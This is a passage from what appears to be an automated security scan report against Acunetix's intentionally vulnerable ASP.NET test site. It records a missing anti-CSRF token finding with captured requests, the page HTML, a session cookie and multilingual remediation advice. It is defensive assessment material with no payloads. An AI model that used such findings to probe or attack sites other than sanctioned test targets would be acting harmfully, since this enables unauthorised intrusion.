          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwK30rH2AgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ9jwc%2FcRnTJwdNTwN8SPSTaigKqpw%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 17859
          
          
          Response body (17859 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyY2RkZNGFyTb9L/R3K+NgG4eTH6G64d5v" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKblqunCgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8M7PLE5RqS1nNbgt2x8WWJp0h2GA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        22. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (455 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Content-Length: 6567
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6567 bytes)
